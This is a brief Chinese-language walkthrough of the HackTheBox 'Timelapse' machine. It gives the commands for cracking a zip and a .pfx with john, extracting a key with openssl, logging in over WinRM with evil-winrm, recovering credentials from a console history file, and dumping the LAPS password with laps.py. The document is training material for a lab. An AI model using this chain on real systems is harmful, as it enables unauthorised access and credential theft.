Timelapse - HackTheBox
nmap扫描
先看88端口
389端口
445端口
发现一个压缩文件,下载下来
爆破一下密码
zip2john winrm_backup.zip >> hash
.pfx文件是类似于一个linux中的ssh密钥文件,将其进行解密
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out test.key
用压缩包的密码不对
在爆破一下
pfx2john legacyy_dev_auth.pfx > pfx
john --wordlist=/usr/share/wordlists/rockyou.txt pfx
执行后得到一个密钥文件
但还需要一个
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert
利用evil-winrm进行连接
evil-winrm -i 10.10.11.152 -S -c cert -k test.key -p -u
提权
上传检测脚本
发现一个控制台历史文件
得到了一个svc_deploy的用户密码
该用户处于LAPS_Readers用户组
https://www.sentinelone.com/blog/laps-vulnerability-assessment/
LAPS存储有明文密码
尝试对其进行获取
https://github.com/n00py/LAPSDumper/blob/main/laps.py
python laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb
尝试登录